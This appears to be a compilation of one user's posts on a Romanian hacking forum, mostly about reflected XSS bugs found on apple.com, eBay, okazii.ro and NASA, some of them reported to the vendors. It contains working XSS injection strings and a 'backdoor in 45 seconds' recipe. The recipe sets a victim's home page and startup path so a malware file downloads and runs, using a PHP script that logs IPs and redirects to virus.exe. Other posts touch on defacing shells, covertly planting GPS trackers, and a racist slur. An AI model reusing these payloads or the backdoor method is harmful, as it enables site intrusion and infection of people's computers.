[XSS challenge]

Simple:

http://imageshack.us/a/img209/7123/simplexss.png

======================================================

Cel Sfw

=========================================================

ImageShack

[[Medium] XSS challenge]

View image: xss chall2

[Xss challenge by me]

View image: xss chall

Ai pm cu linku

[[XSS]*.apple.com]

Odata iti da un mesaj trimis automat de catre un bot,Apoi iti trimite un mesaj genul sesizarea a fost luata in considerare si se fac demersuri pentru repararea ei,si eu am gasit unu si inca mai merge desi l-am raportat

[[Alt XSS]*apple.com]

Nu merge filtreaza </> chiar si asa mergea pe firefox opera si safari nu stiu,dar pe chrome nu merge si multa lume foloseste chrome,deci mai rentabila e varianta mea

[[Alt XSS]*apple.com]

Nu stiu de ce pe firefox nu merge.

Nu este nevoie de vre-un vector bypass pe chrome in acest caz,pentru ca parametrul vurnerabil preluat din get si este injectat direct intr-un tag <script> unde verifica daca browserul de pe care accez pagina este iPhone/iPod*OS.*AppleWebKit*Mobile*Safari.Este ceva de genul

site.com/pagina.html?parametru=ceva';else{alert(1);}if(1==2){// ,iar chrome nu sesizeaza xss-u doar ie il vede.

Iar dupa ce il accesez in pagina sursa apare ceva de genul

<script>

var addSBTag = /(iPhone|iPod).*OS.*AppleWebKit.*Mobile.*Safari/.test(navigator.userAgent);

if (addSBTag) {

var headNode = document.getElementsByTagName("head")[0];

var sbNode = document.createElement('meta');

sbNode.name = 'cenzurat';

sbNode.content = 'cenzurat?parametru=38';}else{alert('danyweb09');}if(1=2){//';

headNode.appendChild(sbNode);

}

</script>

Edit:Daca vreun admin vrea sa ma verifice trimit linkul prin pm

[[Alt XSS]*apple.com]

Unde ma?Te referi la metrics.apple.com nu acolo este xss-u;)

Edit:LOL am uitat in alert box:))

[[Alt XSS]*apple.com]

Mersi mult.Am cenzurat poza ,oricum nu se vedea mare lucru.

Se pare ca nu este singurul loc vurnerabil pe acelasi subdomeniu.Am dat ok la alertbox mi-a afisat pagina apoi am dat serch la ceva fara script in input si mi-a afisat acel alertbox.

[[Alt XSS]*apple.com]

Exploit: XSS

Type: Reflected

Target: *.apple.com

Merge pe:Chrome,Opera,Safari(Pe firefox si ie nu mere)

Proof:http://postimg.org/image/ibbekos91/

//Raportat

[Backdoor in 45 seconds - Challenge]

Cea mai buna metoda e asta:

Dechizi browserul setezi la download sa nu ceara calea de download si setezi tu una pe care sa o stii ex(C:\Downloads).

2.Setezi ca pagina de home un server de al tau gen (server.com/infect.php).

3.Setezi la startup calea C:\Downloads\virus.exe.

Acasa creezi scriptul php infect.php si virus.exe

infect.php

<?php

mysql_connect('localhost','root','pass');

mysql_select_db('logs');

mysql_query('INSERT INTO `ip` (`ip`) VALUES(".$_SERVER['REMOTE_ADDR'].")');

mysql_close();

echo '<script>document.location="server.com/virus.exe";</script>';

?>

[[xss]Nasa]

gaseste si tu daca esti smecher.

[[xss]Nasa]

Nu stiu ce va mananca in pula sa cautati in siteuri gen NASA, Pentagon la care si altii inaintea voastra au avut probleme cu ele.

In loc sa fiti baieti la locul vostru, sa faceti si un ban din programe gen BugBounty etc. , va mananca in cur sa vedeti cum e la puscarie.

Cum a zis Kwelwild atata timp cat nu ai produs pagube sau ai furat cookieuri de la situl respectiv,nu ai produs nici o infractiune .Cine zice ca nu ai voie sa cauti xss-uri in situri?Nimeni atata timp cat nu il folosesti in scopuri malitioase

[Cati ani ai? 2013]

-17 nu cred ca ma incadrez in statistica

[[xss]Nasa]

Daca baietu nu a cenzurat bine poza.

[[xss]Nasa]

Vin si eu!Daca ne vedem in camera 5 eu vreau sa stau la geam:D(Va rog sa nu imi ziceti ca nu are geam,nu imi shpulberati speranturile)

http://s24.postimg.org/4zocry0qb/nasa.png

Macar este net in camera 5?Zic si eu...

[Pack Tools Defacing (Symlink-Cpanel Cracker-Shells)]

frate e normal sa fie detectat ca si un backdoor,este un script cu ajutorul caruia poti prelua controlul asupra unui server,este un "virus" dar perntru servere web.Nu poate infecta sistemul de oprare windows deoarece nu este un executabil.Php ruleaza pe server cum ceapa masi vrei sa iti infecteze calculatorul

[[Xss] okazii.ro]

Foloseste:

" onfocus="alert(1)" autofocus onmouseover="alert(1)" style="display:block;position:absolute;height:100%;width:100%;opacity:0

Mersi mult pentru hint

Am mai gasit unul dar este greu de exploatat dar merge si pe chrome!!

Okazii.ro: Activitatea utilizatorului tao13, istoric calificative, feedback de la utilizatori - Okazii

jos cand dai click pe butonul de afisare pe pagina

[[XSS] *.ebay.com]

Felicitari!

Eu deocamdata am primit un email de confirmare

The safety of our users is of utmost importance to us, so we thank you for your report and dedication to keeping our eBay community safe. We are now forwarding your report to our team of engineers and will let you know when this vulnerability has been resolved.

We take the security of our customers very seriously, however some vulnerabilities take longer than others to resolve. There are several teams involved in working on these vulnerabilities depending on which site has the vulnerability and what function is being exploited.

If the issue is something we are already aware of or is not considered a vulnerability, we will notify you and then close the ticket.

If the issue is considered a vulnerability to one of our eBay sites and hasn’t been reported yet, we will contact you to let you know when the vulnerability has been resolved and, if you’ve followed our Guidelines for Responsible Disclosure, we will ask for your name to add on the Acknowledgment page if you wish to be listed.

Please note: it is not our practice to give updates on the status of tickets until the vulnerability has been resolved.

Best Regards,

eBay Security Research

Din cate mi-ai spus tu o sa mai dureze pana cand ma adauga pe lista nu?

[[XSS] *.ebay.com]

deabea am raportat xss-u

[[XSS] *.ebay.com]

Mersi maestre.Acum cateva secunde am completat si trimis formularu de pe linkul acela.Daca am trimis la securitycenter pot sa postez si la Bug Bounty?

[[XSS] *.ebay.com]

Mersi mult .Sa speram..

[[XSS] *.ebay.com]

Exploit: XSS

Tip:Reflected

Author: Danyweb09

Target: ebay.com

Tested on: firefox,opera,ie(mai vechi)

http://s23.postimg.org/ec084w4i1/ebay_xss.png

Cineva care a mai raportat xss-uri la ebay imi spune si mie unde trebuie sa trimit email

//Raportat

//Mi-au zis ca a mai fost raportat de altcineva am mai raportat altul acum in domeniul principal

//Edit pana la urma am mai raportat unu si am primit HOF http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html

[gps ascuns]

cum adica nu poti intra in masina?Cea mai discreta metoda era in spatele bordului luand alimentare de la cd-player cu o rezistenta sa nu arda ceva,sau sub capota ascunsa in spatele bateriei alimentarea facanduse direct de la baterie(atentie neaparat trebuie rezistenta in cazul asta).Frate daca nu e masina ta si vrei sa montezi un sistem gps fara stirea lui este infractiune daca isi da seama proprietarul

[[Xss]PimlicoAcademy.org]

ai uitat sarcasmul

[[Xss] okazii.ro]

Florentina, Apr 25 17:00 (EEST):

Buna ziua,

Va multumim pentru sesizarea facuta.

Situatia semnalata a fost solutionata, iar in acest moment se efectueaza lucrari pentru securizarea tuturor zonelor din site.

O zi placuta,

Florentina

Mda,macar un mesaj de multumire este de apreciat (l-am cerut sa nu imi mai suspende conturile de pe okazii pentru neplata comisioanelor si au fost deacord)

Stii ce-i da? ...... in brate am glm o sa-ti dea un " Multumesc"

Si tu ce ai primit pe xss-u tau de pe situl ala de negrii?Oooo stai tu nu lai raportat tu vrei sa il exploatezi (bat la pariu ca nici macar nu stii cum) vrei sa le furi conturile negrilor

re:copil prost